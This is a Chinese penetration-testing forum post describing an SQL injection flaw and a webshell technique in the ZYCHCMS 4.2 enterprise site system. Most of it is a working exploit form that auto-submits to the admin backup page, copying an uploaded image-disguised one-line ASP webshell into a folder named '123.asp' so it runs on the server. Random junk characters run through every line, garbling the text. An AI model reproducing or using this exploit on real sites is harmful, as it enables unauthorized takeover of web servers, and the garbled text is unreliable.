中国网络渗透测试联盟

标题: ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell [打印本页]

作者: admin    时间: 2012-9-10 21:09
标题: ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

% a. v% R9 i4 ?& a/ c7 `) c
( z% }% P& V0 p( H5 a
. R) e- B1 v6 |! @: i+ X$ ?( ?+ v- F1 x
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
( s1 Q+ i6 ^# P* Z8 I+ q; A ①SQL注射漏洞0 o  c' P4 {3 `6 Y
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp3 [: k4 Z2 d# w
漏洞原因:未过滤
6 d& {" U, X! V% S4 [3 U( Y 漏洞代码:
3 u! r* ^/ b2 u7 r# R 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
: I) b# R7 _3 j$ d- x' c8 I  @- F 修复方法:在文件开头加入代码
- l/ A4 r4 o2 e! f/ V; v
0 m$ i; u  d! c- Q- B# i! i% h7 Q0 ~$ V, y7 l
②后台拿WBSHELL
. h/ v/ W) ^3 q7 x% o- c1 ]2 [ 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。1 H3 F' H. d0 t
这里在网上找了一个,改了下,将就着用。
$ U' W& _* ~+ p' _+ k3 i0 u: z! p& r 以下是代码本地提交代码/ J  w; Q1 i& r0 _% e% g9 T/ C: J

* a1 g$ d. r* A' }1 _$ B: n! P
& K, I# I6 B, s$ C: i/ d<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
9 z5 \2 C) J6 o/ ^  Q <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>/ k4 P+ V- ?0 X8 W. v
<tr>3 m' b$ ~% k: |/ s8 }$ n' Z
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>3 }) z  @9 R; }2 g5 ~- h- n
</tr>$ S5 O. R* A, i, K2 k' m, Q
<tr>- C7 B6 r# }1 d! f+ N  p6 `' ~
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>- o- r1 e2 i) L$ K3 c
</span>
4 [' W% n1 f9 g <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >5 a7 n2 j- p  t
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
$ [- B8 W. x" u) f1 M" x% C <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
0 O0 }: c, z/ p0 m' R <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d( w7 v& n* k! Z0 O& |) M- i+ y
<div align=”left”>0 \+ N* N/ Q) ~2 u* i% `9 }- F
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
' p" W4 y# h; a! }! ^ <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>8 \0 j6 z" y: W9 a9 g
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
9 a5 I5 n6 Z; K: X </div></td>
: g& e: g5 ^7 _$ E </tr>
- o7 v# z5 M' ?$ P1 Q <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
  ?4 m! A. T, j7 H1 n <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
' D( m  |/ P# W! e" ` <td class=”td”><div align=”left”>
  r+ D' `2 N$ d" f& [ <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />- Q7 M/ V0 ?9 e. L
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>9 O4 `7 y1 e) y) p. D4 L
</tr>) h& A  s/ }4 r0 f" a5 _
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
9 E: q' `- B0 Y <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>2 j+ i7 a9 O. d1 ?. [" Z
<td class=”td”><div align=”left”>
5 w9 @1 ?3 F& a" K4 k; n <input type=”submit” value=”确定备份” class=”btn”1 _1 b1 m4 p. m$ j5 f# K2 t
</div></td>, q/ R2 Z8 g0 j
</tr>. ?% \( ?' x) y% c
</table></td></tr></form>) A4 k, x2 o/ r, c1 w7 |
</table>
1 H2 C- L" n+ m, R! D0 `' l </td>1 k/ D  }/ E1 d9 Q4 ]4 f
</tr>
" b' T  Z# V2 Z/ P# Y </table>" M" w4 N2 c9 u9 g
<script>
0 _/ [$ o( S' P1 x document.all.add.submit();
( e" m/ G3 E" r: t9 \3 b </script>
) A' A& u; E8 x7 u' D" b- o% O / u* Y9 _, m# j. B
8 \+ R5 n$ p$ h1 b0 g( D- @

- B( ]4 i8 b* l' ?* g% v  p
+ H1 y9 m9 I8 m( y% ]# N  P! W
8 J' ^- A/ y% A* j$ x1 v% g
. k) G  T$ L% q6 x3 a; H( t' j4 M0 b! F3 _. b$ [( z- Z& E9 x

: w# i) l% X8 n5 g) h' j! y- y/ _( d6 }+ M( I$ k# [
. d$ ?5 i6 K" K* ^- V; {2 m





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2